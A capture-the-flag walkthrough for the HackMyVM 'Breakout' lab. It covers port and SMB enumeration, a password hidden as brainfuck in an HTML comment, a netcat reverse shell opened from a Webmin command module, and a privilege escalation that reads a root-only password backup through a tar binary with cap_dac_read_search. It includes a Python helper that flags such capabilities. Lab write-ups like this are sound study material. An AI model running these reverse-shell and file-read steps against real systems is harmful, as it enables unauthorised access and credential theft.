https://hackmyvm.eu/machines/machine.php?vm=Breakout
Scan ports.
~ nmap -sV -sC -p- -Pn 192.168.33.145 -oN ports.log
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-10-22 22:02 CST
Nmap scan report for 192.168.33.145
Host is up (0.0022s latency).
Not shown: 65530 closed ports
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.51 ((Debian))
|_http-server-header: Apache/2.4.51 (Debian)
|_http-title: Apache2 Debian Default Page: It works
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
10000/tcp open http MiniServ 1.981 (Webmin httpd)
|_http-title: 200 — Document follows
20000/tcp open http MiniServ 1.830 (Webmin httpd)
|_http-title: 200 — Document follows
Host script results:
|_clock-skew: 7h59m58s
|_nbstat: NetBIOS name: BREAKOUT, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2021-10-22T22:03:10
|_ start_date: N/A
Check the source of index.html on port 80. The default Apache page carries an HTML comment:
<!--
don't worry no one will get here, it's safe to share with you my access. Its encrypted :)
++++++++++[>+>+++>+++++++>++++++++++<<<<-]>>++++++++++++++++.++++.>>+++++++++++++++++.----.<++++++++++.-----------.>-----------.++++.<<+.>-.--------.++++++++++++++++++++.<------------.>>---------.<<++++++.++++++.
-->
The payload is brainfuck. Running it (online or with a local interpreter) outputs the string .2uqPEfj3D<P'a-3, which the comment says is an "access", i.e. a password.
Enumerate SMB (ports 139/445) with enum4linux to find local usernames.
~ enum4linux 192.168.33.145 | tee enum.log
...
S-1-22-1-1000 Unix User\cyber (Local User)
With the username cyber and the password decoded from the brainfuck comment, we can log in to the MiniServ instance on port 20000.
Its control panel includes a command shell module.
Running "nc 192.168.33.128 1234 -e /bin/bash" there (192.168.33.128 is the attacking host) gives a reverse shell. This relies on the target's nc supporting -e; on a build without it, a bash /dev/tcp or mkfifo-based reverse shell does the same job.
~ nc -nlvp 1234
Ncat: Version 7.91 ( https://nmap.org/ncat )
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 192.168.33.145.
Ncat: Connection from 192.168.33.145:35206.
id
uid=1000(cyber) gid=1000(cyber) groups=1000(cyber),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
python3 -c 'import pty;pty.spawn("/bin/bash")'
cyber@breakout:~$
Look for binaries carrying file capabilities with getcap.
cyber@breakout:/$ getcap / -r 2>/dev/null
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
/var/backups also holds a root-only password backup that cyber cannot read directly.
cyber@breakout:/tmp$ ls -la /var/backups
total 12
drwxr-xr-x 2 root root 4096 Oct 20 07:49 .
drwxr-xr-x 14 root root 4096 Oct 19 13:48 ..
-rw------- 1 root root 17 Oct 20 07:49 .old_pass.bak
/home/cyber/tar has cap_dac_read_search, which bypasses file read and directory search permission checks, so it can archive /var/backups even though .old_pass.bak is mode 0600 root. Create the archive with it, then extract the archive in /tmp with the normal tar, which is now a file owned by cyber.
cyber@breakout:/tmp$ /home/cyber/tar -cvf pass.tar /var/backups
/home/cyber/tar: Removing leading `/' from member names
/var/backups/
/var/backups/.old_pass.bak
cyber@breakout:/tmp$ tar -xvf pass.tar
var/backups/
var/backups/.old_pass.bak
cyber@breakout:/tmp$ cd var/backups
cyber@breakout:/tmp/var/backups$ cat .old_pass.bak
Ts&4&YurgtRX(=~h
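The getcap sweep above and the tar trick that follows it are the two halves of one privesc check: find a file capability that bypasses DAC, then use it to read a root-only file. As an added example (not code from the page), the script below parses getcap -r output in both the old "path cap=ep" layout the page shows and the newer libcap "path = cap+ep" layout, flags capabilities that are effective and permitted and known to lead to root, and builds the two commands the page runs against /home/cyber/tar. The getcap lines are the two from the page plus constructed extra lines; the dangerous-capability list and the command builder are my own.

```python
import re
from typing import Dict, List, NamedTuple, Tuple

# Capabilities that hand an unprivileged caller a path to root when they are
# effective+permitted on a binary it can run. cap_net_raw on ping is the
# normal Debian default and is deliberately not listed.
DANGEROUS_CAPS = {
    "cap_dac_read_search": "read any file (bypasses read/search permission checks)",
    "cap_dac_override": "read/write any file (bypasses all DAC checks)",
    "cap_setuid": "change UID, e.g. to 0",
    "cap_setgid": "change GID",
    "cap_sys_admin": "mount and many other admin operations",
    "cap_sys_ptrace": "attach to root-owned processes",
    "cap_sys_module": "load kernel modules",
    "cap_chown": "change file ownership",
    "cap_fowner": "bypass owner checks on chmod and friends",
}

# Two lines copied from the page's getcap output plus two constructed lines in
# the newer libcap output layout.
SAMPLE_GETCAP_OUTPUT = """\
/home/cyber/tar cap_dac_read_search=ep
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.9 = cap_setuid+ep
/usr/bin/dumpcap = cap_net_admin,cap_net_raw+eip
"""


class CapEntry(NamedTuple):
    path: str
    caps: Dict[str, str]  # capability name -> flag letters, e.g. "ep"


# One clause: comma-separated capability names, then = or +, then e/i/p flags.
_CLAUSE = re.compile(r"^([a-z0-9_,]+)[=+]([eip]+)$")


def parse_getcap(output: str) -> List[CapEntry]:
    """Parse getcap output ('path cap=flags' or 'path = cap+flags' layouts)."""
    entries: List[CapEntry] = []
    for line in output.splitlines():
        tokens = line.split()
        if not tokens:
            continue
        path, rest = tokens[0], tokens[1:]
        if rest and rest[0] == "=":  # libcap >= 2.41 separator
            rest = rest[1:]
        caps: Dict[str, str] = {}
        for clause in rest:
            m = _CLAUSE.match(clause)
            if not m:
                raise ValueError(f"unrecognised capability clause {clause!r} in {line!r}")
            for name in m.group(1).split(","):
                caps[name] = m.group(2)
        entries.append(CapEntry(path, caps))
    return entries


def find_privesc_candidates(entries: List[CapEntry]) -> List[Tuple[str, str, str]]:
    """Return (path, capability, why) for capabilities that are both effective
    and permitted; a permitted-only capability needs the binary to raise it
    itself, so it is conservatively ignored here."""
    hits = []
    for entry in entries:
        for name, flags in entry.caps.items():
            if name in DANGEROUS_CAPS and "e" in flags and "p" in flags:
                hits.append((entry.path, name, DANGEROUS_CAPS[name]))
    return hits


def dac_read_via_tar(capable_tar: str, target: str, archive: str, extract_dir: str) -> List[List[str]]:
    """The page's read of a root-only file: archive with the cap_dac_read_search
    tar, then unpack the cyber-owned archive with the normal tar. tar strips the
    leading '/', so the file lands under extract_dir/<original path>."""
    return [
        [capable_tar, "-cf", archive, target],
        ["tar", "-xf", archive, "-C", extract_dir],
    ]


if __name__ == "__main__":
    for path, cap, why in find_privesc_candidates(parse_getcap(SAMPLE_GETCAP_OUTPUT)):
        print(f"{path}: {cap} -> {why}")
    for cmd in dac_read_via_tar("/home/cyber/tar", "/var/backups", "/tmp/pass.tar", "/tmp"):
        print(" ".join(cmd))
```

Feed it the real output of getcap -r / 2>/dev/null; anything it prints deserves a look, and for cap_dac_read_search the archive-and-extract pair works with any archiver that does not drop privileges, not only tar.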
The "old" password in the backup is still root's current password, so switching to root with it succeeds.
root@breakout:~# id;hostname
uid=0(root) gid=0(root) groups=0(root)
breakout